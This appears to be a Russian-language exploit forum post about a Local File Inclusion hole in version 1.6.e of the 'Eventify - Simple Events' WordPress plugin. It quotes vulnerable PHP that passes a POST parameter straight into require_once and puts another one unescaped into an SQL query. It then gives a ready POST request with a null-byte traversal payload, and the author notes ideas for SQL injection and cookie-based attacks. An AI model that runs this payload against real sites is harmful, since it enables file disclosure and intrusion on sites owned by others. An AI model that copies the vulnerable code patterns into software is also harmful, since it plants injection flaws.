Plugin name: Eventify - Simple Events (
download)
Version: 1.6.e
Local File Inclusion
Vuln file: /wp-content/plugins/eventify/php/ajax/fetcheventdetails.php
PHP код:
require_once(str_ireplace("/wp-content","",$_POST['npath']).'/wp-load.php');
$eventid = $_POST['eventid'];
$action = "fetch";
if($action=="fetch"){
global $wpdb;
$table_name = $wpdb->prefix."em_main";
$qry= "select * from ".$table_name." where em_id='$eventid'" ;
//echo $qry;
//echo $qry;
$results = $wpdb->get_results($qry);
echo '<div class="event_title">'.$results[0]->em_title.'</div>
<div class="event_description"><em>Description:</em> '.$results[0]->em_desc.'</div>
<div class="event_venue"><em>Venue:</em> '.$results[0]->em_venue.'</div>
<div class="event_time"><em>Time:</em> '.$results[0]->em_time.'</div>
';
//echo $qry;
}
Exploit:
Код:
POST
http://[host]/[path]/wp-content/plugins/eventify/php/ajax/fetcheventdetails.php
npath=../../readme.txt%00
Note: Хотел провести еще и иньекцию, но бло, кавычка екранируеться (если файл вордпреса инклудить)... Мб есть где файл в вордпересе что даст успешную експлуатацию иньекции! Не пишу need потому что есть замена %00. В новых v. не сработает . В предыдущих плагинах можно еще куками, забыл, так как в $_REQUEST и куки.
